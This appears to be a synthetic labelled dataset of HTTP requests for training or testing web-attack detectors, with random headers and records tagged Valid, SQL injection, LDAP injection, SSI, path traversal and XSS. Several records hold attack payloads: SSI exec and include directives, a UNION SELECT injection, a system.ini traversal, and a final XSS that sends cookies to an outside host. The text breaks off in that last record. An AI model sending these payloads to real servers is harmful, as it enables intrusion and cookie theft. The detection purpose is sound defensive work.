POST /ksucsiyedorbodaen/uht/7u4wtigereonX/rUtHCT2vR@R4wvU/45FhAtZ5/pMWMdTk.Y1CYI6Scj7E/tdT7t7k0mN/oe9slaotixR.jpeg? HTTP/1.1
Content-Length: 235
Content-Language: htgt,n,wfyh
Content-Encoding: compress
Content-Location: http://www.LssnbAps.be/evdp3n/eYtdhiu/6koohln.gif
Content-MD5: Z2xvczcxaWJpVzBleHRyYQ==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 25 Jan 08 12:59:28 CET
Last-Modified: Sun, 04 Oct 09 20:54:02 UTC
Host: www.WmasTyw.cz
Connection: close
Accept: image/gif
Accept-Charset: windows-1253, x-mac-hebrew, euc-cn, x-mac-ce;q=0.8
Accept-Encoding: deflate, compress;q=0.9, deflate;q=0.5, deflate
Accept-Language: 8H0chd5e-b
Cache-Control: no-store
Client-ip: 154.39.118.4
Cookie: Ww6rRl0t=619012
Cookie2: $Version="607"
Date: Sat, 03 Feb 07 15:03:30 GMT
ETag: W/".RVg91q.nGCx@5v"
Expect: mfaf98lT=tnrd;eenocnca
From: zqhtasa7@rsaljt.it
If-Modified-Since: Sun, 07 Aug 05 22:41:53 CET
If-Unmodified-Since: Fri, 29 Aug 08 16:35:50 GMT
If-Match: "3E7LGMXe7cSvZFU"
If-None-Match: "jslDUG5.XBJdvgpAL"
If-Range: "KZc0mBhR.o5yLE6"
Max-Forwards: 145
MIME-Version: 8.6
Pragma: bshe=aiibw
Proxy-Authorization: NTLM eWxvbHNtZTZJYklvZXRuN3lyNkhyemF3ZXN3RWVkdGJqM3NrZzNl
Authorization: NTLM Zm5ldHN4YnNtaXVudDVjaGdOZlRkZW1zYWlyY2d3ZW5yZWw=
Range: 272903-589,341-,423-
Referer: http://www.teelrr.org/nsanies/exps.dll
TE: chunked;q=0.7,gzip;q=0.1,chunked;q=0.7
Trailer: Trailer
User-Agent: r9it (tuxgmnh; eprTlq7Ls7; ryuJ9P9l2C; euQnF24Z.-)
UA-CPU: Sparc
UA-Disp: 1425,8375,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 527x0259
Via: 3.3 91.153.75.250:033, FTP/8.7 www.r2ycr.htm, FTP/4.7 www.3ile8r.jpg
Transfer-Encoding: compress
Upgrade: sng/7.6, eaor7/9.5, taop/9.3, dnAf/9.2
Warning: 173 28.187.74.144 "intyt8" "Wed, 16 Jan 08 01:05:54 UTC"
X-Forwarded-For: 26.142.203.81
X-Serial-Number: 3100317318115604683
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

PtDse=63331&i7rezukwiiu8k=eo4t&enpgee=hbt&eusks=uTdbryladoe&ljim=eIrnteR80s r]pa&idis=88307718&nndb1eny=vabetween3a&tel3r=5&Iemm9uthhnsa=eSLYGBbI2r7H&wEUzr=05649&ri3SrRqhscript9=sgeanat&jraaxd4ntnasiY=7838&PKvdHJH=e0g&n4o=ewautoexecE

End - Id: 4965
Start - Id: 20267
class: Valid
GET /4oaL17innteicese.mspx?edrEcTte6o=s%3Cr&ts0ed7o8sapet=dh2aErJtan&qlS8P3M=tdimgadmocha7fd HTTP/1.1
Host: www.nz88rk7Ss.com
Connection: keep-alive
Accept: image/*;q=0.7, application/*
Accept-Charset: windows-1254, windows-1254;q=0.8, x-mac-hebrew;q=0.3
Accept-Encoding: *;q=0.3
Accept-Language: *
Cache-Control: htIadnih=1hsc
Client-ip: 66.96.116.160
Cookie: azpoc=hPCv;G--CphPrPV8=42;jre2imh4rjei= y2a0nrdw;IUo_rZ=ef8cxK;olair4hht=f
Cookie2: $Version="389"
Date: Sat, 25 Mar 06 10:23:06 GMT
ETag: "GRSd.RAB2xqYJdR"
Expect: eata
From: ptdetu@lTemn.cz
If-Modified-Since: Sun, 06 Jul 08 10:32:56 GMT
If-Unmodified-Since: Fri, 25 Jun 04 17:55:49 CET
If-Match: "cF.nRbAfVdaIirbf9kFK"
If-None-Match: "ik@htwPUK3N_-GjxZU9"
If-Range: Wed, 28 Apr 04 13:10:22 GMT
Max-Forwards: 2
MIME-Version: 1.5
Pragma: no-cache
Proxy-Authorization: NTLM Y25lYWFlZXJybjZHZXNkYXRzY21ld2VvZG5zOHVhaGRseGVmZWVodGd3c29lbA==
Authorization: Digest nc=7Caf5DaF
Range: 2-254176
Referer: http://visaodey.be/leesr.cfm
TE: deflate
Trailer: Accept-Language
User-Agent: 5utafniontDne
UA-CPU: MIPS
UA-Disp: 161,462,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 0564x652
Via: N1rri/2.2 www.nke7e.jpg, HTTP/7.2 www.otP4.tiff:0843, sNc/0.1 www.aq5nle.gif
Transfer-Encoding: identity
Upgrade: eCc/4.2, tne/4.8, kdeqH/8.0
Warning: 058 www.eyes9l.tiff "iseRqeh6t" 
X-Forwarded-For: 33.165.104.226
X-Serial-Number: 11361465282
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20267
Start - Id: 37565
class: LdapInjection
POST /nMhob/NYvrcpw-@Sdivf@p2/7o8e.exe? HTTP/1.0
Content-Length: 210
Content-Language: Ao
Content-Encoding: compress
Content-Location: http://ETma.ch/5uni/rrees2e.js
Content-MD5: N2FvaGVybHJ1ZXZvYWw3cg==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 14 May 08 16:18:50 CET
Last-Modified: Tue, 10 Aug 04 20:11:07 UTC
Host: 229.163.144.174:80
Connection: close
Accept: */*;q=0.3
Accept-Charset: ks_c_5601-1987, windows-1251;q=0.3
Accept-Encoding: identity;q=0.9, deflate, gzip, deflate, gzip
Accept-Language: ot-atktttu
Cache-Control: only-if-cached
Client-ip: 7.129.128.89
Cookie: M6iAvsesy2rsh3=e;ie3oahc=tonnuahlazsystemSm5;yaofig4r=g1Eh_AbqpFy;open_AWjrin=dMdptminifDtap08;Snz8smbm=091
Cookie2: $Version="86"
Date: Tue, 12 Dec 06 19:18:50 UTC
ETag: W/"opjc3ToLOFC@rsjI2Os"
Expect: liIlS
From: Stnfsrr@eacmtr.gov
If-Modified-Since: Sun, 13 Jun 04 02:37:47 CET
If-Unmodified-Since: Tue, 02 Nov 04 05:12:08 UTC
If-Match: *
If-None-Match: "OLADb.qgfnfqTeE0"
If-Range: Mon, 16 May 05 05:58:40 GMT
Max-Forwards: 526
MIME-Version: 9.9
Pragma: cRrro=slgpp
Proxy-Authorization: Digest opaque="rtsrac"
Authorization: NTLM aWVubmxHb3JldmZSZ2lsMWlhTmhDbHNxaGk3ZGhhb0R1b2lvTDh4dnNjTk1lWW90
Range: -74,-46159,08-370587
Referer: /mo4iiwae.mpeg
TE: deflate,chunked;q=0.5,trailers
Trailer: If-None-Match
User-Agent: faeifaufdr
UA-CPU: PowerPC
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 299x8794
Via: 6.5 www.uf7ept5.jpeg, eAsedr/7.2 www.9ttm.css
Transfer-Encoding: deflate
Upgrade: etMr/2.7
Warning: 065 105.103.99.69:35 "ltome" 
X-Serial-Number: 01594707388200191754
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

snhkbhe=[&fey=0713&sIiawLA=7774913&crtiih=?rhrx9 Dsrlsh3t&ltebNab=fM6aWZpRgd&dirtnapn=6&9wnigeherd6Xic=5?cmd&sea1alrn=fGzzjv&eiidet=)(|    (et=t9*)&uahg=3&1yenbEuenifq=29644&z-FservicesR=uTsdi

End - Id: 37565
Start - Id: 30594
class: Valid
GET /uOivmm4BYKlED_xRmldB/hV/hi.A/cdq/5ut.oJBZG/nbsvtwncem/sfY6O/eQpsdXaq.swf?ia4aeAnsq=098497&Cp_Fyconnectlikeor=batnel&icrehbxoh8estis=lkel&-rlL-sGconnectJS=cservicesj%29+ony%5C&hifso9ht=Ttmpta02&eeae=aperltooa+%26%25%40t&8Wtawyx=ioDlltphponisrt&eynne=5970&ptrekehsut=bsabodys%3Dtjtelnetjr%3Db0&fcheOtLenuWn=16655976&tnak8fttdt4h=mshlnnyTo1dre HTTP/1.1
Host: 106.192.8.21
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: *
Accept-Encoding: deflate;q=0.6, compress
Accept-Language: *
Cache-Control: min-fresh=60
Client-ip: 235.52.181.158
Cookie: En=T%thaYa0alsfjtvn3syae;etZd5ea=0520031;eesr=0a?cyr1r;wruuhcNac=qysayv
Cookie2: $Version="001"
Date: Wed, 06 Apr 05 06:39:33 UTC
ETag: "gg1X-8UhAWyIZ5KCUz_-"
Expect: 100-continue
From: cehhmBuy@esgh9bl.de
If-Modified-Since: Thu, 14 Sep 06 22:59:54 GMT
If-Unmodified-Since: Thu, 22 Oct 09 04:47:20 GMT
If-Match: *
If-None-Match: "tYHYIjcrjNVHTrmk"
If-Range: Tue, 20 Jan 04 14:56:48 GMT
Max-Forwards: 49
MIME-Version: 9.2
Pragma: itr=teEsm
Proxy-Authorization: dlri frtoat=ifoee5n
Authorization: Digest qop=r6j2
Range: 889941-69,6925-6751,26535-
Referer: http://s8eonnrd.net/lzhn2wa/nnekm.tar
TE: deflate;q=0.6,trailers
Trailer: Transfer-Encoding
User-Agent: wT8nTHoeV/4.2.6
UA-CPU: 68000
UA-Disp: 436,0901,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 689x0740
Via: 6.2 www.leIs3.tiff, afb8zi/1.5 193.227.145.191, 7.9 www.1diaqdcs.gif
Transfer-Encoding: compress
Upgrade: l8ino/0.2, geoi1/3.9, w1yf/3.0, dNna/4.3
Warning: 981 www.tChen.tiff "enpV8eeRsnbvnineberf" 
X-Forwarded-For: 113.222.226.64
X-Serial-Number: 79914989141850023
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 30594
Start - Id: 10109
class: Valid
GET /sshgpt/rkpTe1dhimnelxooN/eF1pt/eRJzxtEHNe/e_t44kS-jGz0s0.h@EH/elx75_pJZ/Aeh8/.copyDCfbA4fx./act/furheNooruomluj.tiff?et6sseroaerd=rX4PuNaH6R%40&zZ_HtFWh9wY=tahatmbe0nuwo HTTP/1.1
Host: www.08tabuddbh.uk
Connection: prbHd
Accept: */*;q=0.4
Accept-Charset: *;q=0.0
Accept-Encoding: identity, deflate
Accept-Language: tq-dNtxhiv, oi2-7emecEs;q=0.9, eimsh-epo;q=0.3, ss-f7
Cache-Control: only-if-cached
Client-ip: 136.0.151.57
Cookie: in8Gl=reWdsgbaest;rietazel=smj;clLr=033440073;us=t.ZMA;tF5lp3aoaahe=56800
Cookie2: $Version="6"
Date: Thu, 10 Jun 04 12:52:33 GMT
ETag: ".kTon@nrcyi7gsbpU553"
Expect: 100-continue
From: tsbr5seo@najlknme.it
If-Modified-Since: Sun, 14 Aug 05 19:18:59 CET
If-Unmodified-Since: Fri, 22 Oct 04 14:43:15 GMT
If-Match: *
If-None-Match: "a_SUUZr3LFsQ9nL"
If-Range: Sat, 05 Jul 08 22:12:05 GMT
Max-Forwards: 91
MIME-Version: 0.3
Pragma: no-cache
Proxy-Authorization: NTLM UlQ3dG5uZHR0YWFydWhlcnN0dHUzNW1PZTZvZGV0bHppYWZubnJ0bm10YWZocw==
Authorization: NTLM bzVuZW1zZXNpY2dlYW44VXJ0dWRldzl5ZUxmYWVoZXN0dG44WGxlc00=
Range: -4,998277-
Referer: /ugxee/iozasums/igbatt.tar
TE: trailers,trailers
Trailer: Connection
User-Agent: Mozilla/3.1 (Windows; U; Windows NT 5.3; 7r-ne; rv:4.5.7) Gecko/77887032
UA-CPU: x86
UA-Disp: 5781,4681,16
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 9723x8891
Via: 0.0 81.112.202.86
Transfer-Encoding: srMe; ate1au=6arrc
Upgrade: 9auhs/2.2, Vr6/5.2, idMee/1.6, dTb/1.4, Owrn3l/3.6
Warning: 301 www.Ipmhyt.jpeg "eqieennEenOi6nv" 
X-Forwarded-For: 219.87.157.60
X-Serial-Number: 70224009
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10109
Start - Id: 40192
class: SSI
GET /up0UiUNrysmo2Xs/vijGcmd/bJ2gQVKMHGYSSQu/quipqh4/iELL/VjAC/wso/rrha0eTf8g/3Te.html?ralboulnTfs=irrhdaesmeonaoPesa&vnOvpcsnom=%3C%21+%23%3C%21--++++%23exec++++cmd%3D%22id%22--%3E&dtnhSin96=0tkrp%3De HTTP/1.0
Host: 131.29.16.108
Connection: raiws
Accept: text/*, application/x-tar;q=0.0
Accept-Charset: euc-jp, euc-kr, windows-1250
Accept-Encoding: *
Accept-Language: anae7e0-nbT;q=0.0, in-h;q=0.0, eoeew-tnm, t-9ydnf;q=0.8
Cache-Control: no-cache
Client-ip: 95.143.38.157
Cookie: 9ulompr6bso=4iE@qiJ;fKCY0P=csg2nrsetne;gssis=eVT3lAejr;aos=2;5eePslt6Nctls=aed;ffeAs=005691985
Cookie2: $Version="6"
Date: Tue, 18 Jul 06 11:08:10 CET
ETag: W/"IY2@3WKoRmkzER6"
Expect: 100-continue
From: beevy@rdaeiuersl.de
If-Modified-Since: Wed, 19 Sep 07 06:30:23 UTC
If-Unmodified-Since: Mon, 06 Oct 08 05:15:08 CET
If-Match: *
If-None-Match: *
If-Range: Sat, 10 Oct 09 21:12:58 CET
Max-Forwards: 0299
Pragma: Trmnt='otpq3s'
Proxy-Authorization: Digest nonce
Authorization: Digest username="yxTy"
Range: 95170-36663
Referer: http://www.nsnwPr9s.be/4ritylh.mpg
TE: gzip;q=0.2,trailers,trailers
Trailer: Transfer-Encoding
User-Agent: ii6es9lihpIri9iot3e
UA-CPU: 68000
UA-Disp: 134,343,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 9646x716
Via: 0.6 40.35.35.122, 0.7 3.184.154.12, FTP/7.3 www.b1launrl.jpg:7515
Transfer-Encoding: aieyof; 7lsrotr=sAadc
Upgrade: aiaEi/3.2, nenl/7.3
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40192
Start - Id: 41843
class: SqlInjection
GET /in0nmdh3n6mzr/eRUA166hD2Cz8t/esMx7IXH_1Zx_/thohst/mabmaeg.pl?loeaoaninmfcl=%7Ey&CunionCaJYGFoUYy=%3Ch&litnet5rt4ahC=%27++++UNION++++ALL++SELECT++dpeotz++FROM+ffLc+++WHERE++%27%27++%3D+++%27 HTTP/1.0
Host: 107.204.229.138
Connection: close
Accept: */*
Accept-Charset: *;q=0.8
Accept-Encoding: *;q=0.6
Accept-Language: aa-4rtbe, n9oig-clsia;q=0.7
Cache-Control: only-if-cached
Client-ip: 78.57.136.131
Cookie: e32TluAeanOesa2=adminalcb;65bnot10ieusm6a=1;5iart=68182;.wK2txUuZQ=0tdt
Cookie2: $Version="58"
Date: Sat, 10 Sep 05 12:34:04 CET
ETag: "Pcy6CIpDuU4di8br"
Expect: eeofsc=natlqi
From: rhserwr@eoSaan.it
If-Modified-Since: Sun, 17 Sep 06 13:50:27 GMT
If-Unmodified-Since: Sat, 01 Jan 05 21:53:37 UTC
If-Match: *
If-None-Match: *
If-Range: "Uwh5z.l.LfcAi4HSGr"
Max-Forwards: 37
MIME-Version: 1.6
Pragma: no-cache
Proxy-Authorization: Digest algorithm=MD5
Authorization: heea seltmfr=o7On
Range: -0842
Referer: /4urbii5/hHes4/qthd0s/Bahadiso.wmn
TE: trailers,gzip,gzip
Trailer: Max-Forwards
User-Agent: 66EKUdY http://www.thsl.com
UA-CPU: 68000
UA-Disp: 658,0030,16
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 5914x483
Via: FTP/7.0 www.sdiMcdb.jpg:7, 3.0 246.96.49.78
Transfer-Encoding: identity
Upgrade: rz8alu/5.3, a4rs/2.4, FoE/2.5, 2hiDn0/2.7
Warning: 905 112.14.120.88 "oDrineNkeu" "Sat, 31 Jan 04 09:06:11 UTC"
X-Forwarded-For: 187.70.226.8
X-Serial-Number: 431124702375
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41843
Start - Id: 39786
class: SSI
GET /demdaceugiieaahepert.shtml?i5=mmDh&toXuybBwsiH=hfhhe&shepohooese2aa=egwo&ppelnsm1dsg=ncede&v5ezaOvEe=02349&dgfdeetulLN=s4u&tNazRp2niyhit=229&Ec=49777&R_lYQY=Ersinw&cecuT=rlgUdm&ereotnmaecc=%3C%21--++++%23include++virtual%3D%22%2Fetc%2Fhttpd%2Fhttpd.conf%22++++--%3E&s4wmrinisohe=16&V5open8Dgtelnet=+http+&t3ebte5tl=AoiouAohs56oeiiyy HTTP/1.0
Host: www.rxsH5sdc.com
Connection: close
Accept: */*
Accept-Charset: *;q=0.5
Accept-Encoding: deflate
Accept-Language: *;q=0.1
Cache-Control: max-stale=8286
Client-ip: 9.173.197.156
Cookie: bXFaXboot.inizC.a=ni3
Cookie2: $Version="9"
Date: Wed, 06 Feb 08 05:53:06 GMT
ETag: W/"Ne7FULYkvbu.-BWNg_8"
Expect: ailel=ewuid;sddttdad
If-Modified-Since: Thu, 11 Jan 07 12:25:57 CET
If-Unmodified-Since: Fri, 27 Mar 09 15:51:33 GMT
If-Match: "bHJKkxda8xbD6vUFfSP"
If-None-Match: *
Max-Forwards: 872
MIME-Version: 0.5
Pragma: nhasei='D'
Proxy-Authorization: Digest username="usl1mwH3"
Authorization: NTLM YXR0YXJ2ZWV1cXNydVhzNW50bmc5N0U5d3VyYjZ5c3hhdGRuZDk0aGc=
Range: 538-81062,0-593619
Referer: /ove1.asp
Trailer: Upgrade
User-Agent: Mozilla/2.8 (Windows; U; Windows NT 0.4; pG-ez; rv:7.8.6) Gecko/67087671
UA-CPU: Sparc
UA-Pixels: 181x202
Via: FTP/5.9 www.snhelRO2.css, 6.3 www.amdrli.shtml, HTTP/3.4 105.227.173.161
Transfer-Encoding: deflate
Upgrade: oLt/5.9, tEgb/6.9, 6laet/2.7, faare2/0.4, vst20/6.5
X-Serial-Number: 39977076241136
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39786
Start - Id: 36010
class: PathTransversal
POST /0vQbmochadv_0T.shtml? HTTP/1.0
Content-Length: 193
Content-Language: ie,nptae,as7i
Content-Encoding: deflate
Content-Location: /hncnr4I.wav
Content-MD5: ZWhobnRvZG9oZW5hOWVlbg==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 11 May 08 21:45:12 CET
Last-Modified: Mon, 12 May 08 08:34:46 CET
Host: 152.145.80.105
Connection: keep-alive
Accept: audio/basic;q=0.6, application/*;q=0.0, video/mpeg;q=0.4
Accept-Charset: x-mac-arabic;q=0.9, ks_c_5601-1987, x-mac-arabic
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Cookie: dcgpeks=820727;oesl=sr|3d;scBaonEao=sy1mH0Y7f;rctnidQsasn=e46irt2aii;2co5pEti=fir;RrWUs=3932897
Cookie2: $Version="7"
Date: Wed, 26 Jul 06 21:01:50 UTC
From: snploe@2Ooln.biz
If-Modified-Since: Sun, 05 Aug 07 16:10:00 GMT
If-Unmodified-Since: Tue, 21 Oct 08 08:03:30 GMT
If-None-Match: *
If-Range: *
Max-Forwards: 056
Pragma: 73='h'
Range: 0748-49,25526-,627-90
Referer: /eee7eg/kh6ee4km/Rwuhri.pl
User-Agent: Mozilla/3.2 (Machintosh; U; PPC 5.5; pd-bt; rv:7.7.3) Gecko/39693099
UA-Disp: 873,979,32
Via: 9.1 www.omfutHt.jpeg
Transfer-Encoding: compress
Warning: 658 108.103.139.154 "Iuht" 
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

6caohdt0B9aoekt=e&group byz43n5=oJAZ&inmiZhtRgrtn=897004&sucgie=R=aLwsilvarmai&hj4eeFb=\WINDOWS\system.ini&rh=01194219&7fpaotb=+Eg&dnlegSy=88&edsm=4&4iegeedeo=wLG4U&aeakbeAoeeS0u=125805

End - Id: 36010
Start - Id: 735
class: Valid
GET /lKpnT2mfu/etuIaehnanpbhtahhwbh/nslibhnO2enAt0m/buZJKVEfkbrKWOujDY/oei/_R.msf?rbrhos=59614&rmSNadK=1382877486&hasproataoeyhaL=cuqEhtpasse37ncA1&1e=85&mbpote=tuw&3Cotex=vtcn HTTP/1.1
Host: 172.159.208.86
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-ce;q=0.2, ks_c_5601-1987;q=0.7
Accept-Encoding: 
Accept-Language: *;q=0.0
Cache-Control: max-age=274
Client-ip: 4.184.115.67
Cookie: 2qogadosc=(@us y e;oos5=tqFit:enph-aukajta(r i
Cookie2: $Version="670"
Date: Wed, 15 Jul 09 03:49:16 UTC
ETag: "mXqzusF5UMEWVN9kjdqZ"
Expect: 100-continue
From: eet5ayi@trifo.it
If-Modified-Since: Thu, 30 Apr 09 11:27:41 UTC
If-Unmodified-Since: Wed, 21 Sep 05 13:56:22 CET
If-Match: *
If-None-Match: *
If-Range: "2yVMuxgdm_@XqSs"
Max-Forwards: 5
MIME-Version: 2.7
Pragma: no-cache
Proxy-Authorization: cll2 orUtkN=3ekdTnt
Authorization: Digest username="oiyt"
Range: -523,85-12956,5-
Referer: /tnrjd/diQnnOan/3n2rertw/u6ueu/eaodt.tiff
TE: chunked
Trailer: Cache-Control
User-Agent: snnw1p6
UA-CPU: PowerPC
UA-Disp: 573,0887,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 180x0493
Via: 6.3 21.32.31.31, HTTP/1.9 www.ahuate.jpeg
Transfer-Encoding: ItEv; aSnl=Sa252ud
Upgrade: 3hE/0.4, uhza/1.9
Warning: 247 www.6atoou9u.css:82615 "7ySec6LYstptsi" 
X-Forwarded-For: 161.122.52.147
X-Serial-Number: 93643715555060287385
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 735
Start - Id: 29692
class: Valid
GET /nJB/3ueimeim/tLhtaccesNUD/6MDchilds2qkZQC/ZcatlKbuM/hExrlDvm5tURCv/lunht/e5lL-NW9NLShsehm3m-/a1w6B0pa@0/r_iMFpB.aspx?_1n1LOllO=execsS8timsdeletee&soanmGlim=puq+8&vei5rprt51nmj6e=0946&smgfmsta=6982925688&lshNwz2Eerhcew=tmp%40vi+athuetuiriT&t7xdpihkptJN=e+h%5DlfNkT-optr&IurciEexu=064&gfv9stah4ie=nr623WjBq&odcedmcal=naab+Ttosrttd%7Cemensetc&noa4Ymih=3876&6ui9sje4NEtts=h1g&hhcg7l7rteae1=aaCBU&yhOaBLzB-=iVTNS3Go&bEaT=9&se8dtb55=woiieaeroTtm5tm HTTP/1.0
Host: www.ohomtavrf.st
Connection: 2eiGs
Accept: video/quicktime, video/*;q=0.4
Accept-Charset: *;q=0.2
Accept-Encoding: identity;q=0.3, deflate
Accept-Language: *;q=0.6
Cache-Control: no-transform
Client-ip: 210.96.241.160
Cookie: 0Dboot.ini4jVYpshutdown=O ;ntaA2xf=hAhYl;ut=cwsnrlikeocrwtgconnectltlh;2sednaI=634572;3etrrtdse=ja
Cookie2: $Version="020"
Date: Wed, 02 Jan 08 10:42:19 GMT
ETag: W/"afmmS4lHl2tcKb6vt"
Expect: 100-continue
From: icqca@mi5a7iM.cz
If-Modified-Since: Wed, 12 Jul 06 14:02:37 CET
If-Unmodified-Since: Wed, 04 Jun 08 17:06:20 UTC
If-Match: *
If-None-Match: *
If-Range: "hCcu4TU66QDLGMLoIRsj"
Max-Forwards: 10
MIME-Version: 3.1
Pragma: uvjurtrt=bayret
Proxy-Authorization: Basic d2NpZnRyeTpvdFVnZWxocw==
Authorization: Digest realm
Range: -551432,8-
Referer: http://8i7pE.org/ag1hi.msf
TE: trailers,trailers
Trailer: Accept
User-Agent: Mozilla/2.1 (Windows; U; WinNT 4.1; do-eh; rv:3.3.9) Gecko/90548277
UA-CPU: MIPS
UA-Disp: 0427,819,32
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 293x7382
Via: 5.2 116.216.29.154, bdtdhy/7.4 168.170.152.118
Transfer-Encoding: TSae
Upgrade: vdqdss/4.7, wsibnl/9.2
Warning: 634 www.heiixDa.html:23 "eesheuoaeAepggkenat" "Thu, 13 Nov 08 12:05:34 CET"
X-Forwarded-For: 25.252.143.178
X-Serial-Number: 149051815209
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 29692
Start - Id: 21204
class: Valid
GET /Il/7eeaa/TlaosttEaineAernhmnt/i2dr.php?bbtmoeapesqe=98&jndil1mpatn=55&NiCmetaN=aOhwn&dr=jez&onorvTenj=3 HTTP/1.1
Host: www.an4eatda6S.uk
Connection: close
Accept: */*;q=0.0
Accept-Charset: *;q=0.9
Accept-Encoding: *;q=0.8
Accept-Language: em-rhsenc
Cache-Control: max-age=4
Client-ip: 205.157.119.187
Cookie: ipeacou=hdsu0;eBgrxt4Wfht=cmame9utc6ri
Cookie2: $Version="523"
Date: Wed, 28 Apr 10 23:04:01 CET
ETag: W/"GttmMiKOf9YUXGvGQFS"
Expect: teouesti
From: iiteLaco@s0ovono0.de
If-Modified-Since: Wed, 05 Jan 05 22:05:30 CET
If-Unmodified-Since: Fri, 04 Jan 08 01:56:07 CET
If-Match: "d0g_Y_0u9@w87QdSs"
If-None-Match: *
If-Range: *
Max-Forwards: 2172
MIME-Version: 5.2
Pragma: no-cache
Proxy-Authorization: Basic anIxZW1zOnRsNVZ0b0k=
Authorization: Basic YWFpaHlkb246dGhldGRsdA==
Range: 750-,720-8
Referer: http://sglmEsce.be/ldmp0/en8aStrN/clbthue.wav
TE: trailers
Trailer: Accept-Encoding
User-Agent: Mozilla/8.4 (compatible; MSIE 7.6; WinNT; Slwraur; ygbnl)
UA-CPU: MIPS
UA-Disp: 158,905,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 402x543
Via: HTTP/8.4 2.140.71.122:4712, 8.5 192.33.172.98
Transfer-Encoding: H2ij; r30Es=scg3T
Upgrade: paa/5.3, a9Au/8.0
Warning: 837 www.amWce.png "H1oteohur" 
X-Forwarded-For: 188.221.207.247
X-Serial-Number: 59070320444976577945
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21204
Start - Id: 23186
class: Valid
GET /ea6uDRpkjQ3Z-kWt/eqZqqD7IZbg7IfRa@IEM/nBimUN/tkrLO0x/BZ.MRFPRJkoaal/yesFGTyKu8Ygjtf@/joofeuhe9r9XvoagnI/eenaL/lJfeS.shtml?Uazyroo7taEqfat=2&16D8l1Ochildidj=weval%3A&mnoareLututnyu=exec0af&i2=variuwgetb6%7Ep%3Ds+r&isptnw9tteom=yi%2Bs&osehh=60693124&ldingni2HsWoawt=s&A1FZ=iEeoahttpsTobjectpas66%3A8aB&vei7thddM=478602914 HTTP/1.0
Host: www.nsprs0ha.fr
Connection: close
Accept: */*;q=0.7
Accept-Charset: *;q=0.0
Accept-Encoding: *;q=0.0
Accept-Language: f1yt7bma-yt;q=0.5, kew-haetmih, DeaUg-lhhnb, t-oDnatrt, itgJmDh-niGiit2g;q=0.6
Cache-Control: max-age=829
Client-ip: 195.72.80.101
Cookie: fsdyylbtIeHU=tH4qw_0R;1botlcthodyin=1;hyd78I=3;t0ofba=nj5u
Cookie2: $Version="98"
Date: Tue, 05 Sep 06 22:23:34 UTC
ETag: W/"Xq5.Xw_NbR_Zdkg9UqBS"
Expect: 100-continue
From: yEynS@yostnHon.org
If-Modified-Since: Thu, 09 Nov 06 12:17:48 CET
If-Unmodified-Since: Mon, 22 Feb 10 18:26:56 GMT
If-Match: *
If-None-Match: *
If-Range: Sun, 13 May 07 23:45:14 GMT
Max-Forwards: 8
MIME-Version: 3.7
Pragma: no-cache
Proxy-Authorization: NTLM OTZodXJlQ3RtWDh0ZThheG40ZWFhZ2lyVHBIZXRpdHZiaGVvc2hI
Authorization: NTLM eGY2V3Vob2h3aXJzb0lybm1BdEk1b2kzaGRjcW9lZmduQXowbWltMGkwZWthZXM=
Range: -993347,19-784
Referer: /nbbsvre/NCrtA5.pl
TE: trailers,trailers,trailers
Trailer: Date
User-Agent: Mozilla/3.9 (Machintosh; U; Mac OS X 2.4; nr-un; rv:2.0.8) Gecko/63456768
UA-CPU: PowerPC
UA-Disp: 1015,816,32
UA-OS: Win95
UA-Color: color32
UA-Pixels: 955x1403
Via: 7.3 243.165.119.53, 6.4 www.4bsoyts.css, 3.2 www.o0Mi.htm:765
Transfer-Encoding: xertb; cUrl2Ae=ahetlI
Upgrade: Nmotn/6.8, q7lyw3/3.8, lnmv/7.8, r3di3/6.0
Warning: 909 www.n8hewn.css "tEwe81aorN2bNEEtoee" 
X-Forwarded-For: 175.124.77.138
X-Serial-Number: 76690909
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 23186
Start - Id: 47460
class: XSS
GET /eXk@NPwb@8d@.tiff?tTLowa0ul=euKDaBMi&fzsuJ%usystemPgacceptP=%3Cimg+++++src+%3D+++%22++it+++%22onmouseover+++%3D+%22%5Bdocument.location.replace++++%28%27http%3A%2F%2Fwww.ndchtide.com%2Fcgi-bin%2Ftrlani.cgi%27%2Bdocument.cookie%29%3B%5D+++++%22+%3E&Stesnotruals=nxIE11sfMf9K HTTP/1.1
Host: www.ueva.fr
Connection: Nosue
Accept: */*;q=0.2
